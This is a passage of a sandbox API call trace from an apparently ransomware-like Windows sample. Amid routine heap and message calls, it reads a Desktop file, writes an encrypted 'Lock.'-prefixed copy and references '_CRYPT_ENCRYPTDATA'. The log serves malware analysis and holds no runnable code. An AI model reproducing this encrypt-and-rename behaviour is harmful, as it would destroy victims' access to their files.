lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.387] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0184.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0184.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0184.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0184.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0184.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0184.388] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0184.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0184.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0184.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0184.390] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0184.390] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/hkGbR.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\hkgbr.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0184.391] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0184.391] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0184.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0184.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0184.391] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0184.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e56430 [0184.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.392] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop/" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0184.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0184.392] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0184.392] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f14010 [0184.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0184.393] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0184.393] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop/Lock.hkGbR.wav" (normalized: "c:\\users\\fd1hvy\\desktop\\lock.hkgbr.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bf0 | out: hHeap=0x970000) returned 1 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53bc0 | out: hHeap=0x970000) returned 1 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0184.432] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.432] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0184.432] TranslateMessage (lpMsg=0x8cf708) returned 0 [0184.432] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0184.432] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0184.433] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0184.433] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.433] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0184.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0184.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.436] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0184.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0184.436] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0184.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0184.436] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0184.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0184.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.437] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0184.437] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0xe5c020 [0184.441] SetFilePointerEx (in: hFile=0x2d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0184.441] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x10000, lpOverlapped=0x0) returned 1 [0184.445] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x6d5, lpOverlapped=0x0) returned 1 [0184.445] ReadFile (in: hFile=0x2d0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0184.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0184.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0184.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d5) returned 0x2f24018 [0184.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe5c020 | out: hHeap=0x970000) returned 1 [0184.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0184.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0184.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0184.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0184.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0184.451] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0184.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0184.451] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d5) returned 0x2f346f8 [0184.453] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0184.491] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.491] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0184.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.492] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d5) returned 0x2f24018 [0184.493] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0184.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0184.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0184.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0184.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0184.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0184.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0184.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0184.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0184.495] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0184.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0184.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0184.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0184.496] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0184.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0184.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0184.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0184.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c28 [0184.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0184.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0184.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0184.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0184.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d5) returned 0x2f24018 [0184.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0184.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0184.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0184.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0184.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c98 [0184.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0184.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0184.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0184.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d5) returned 0x3be0048 [0184.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0184.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0184.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0184.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0184.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0184.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0184.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0184.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0184.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0184.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0184.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0184.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0184.503] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0184.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0184.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0184.504] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0184.504] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0184.504] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 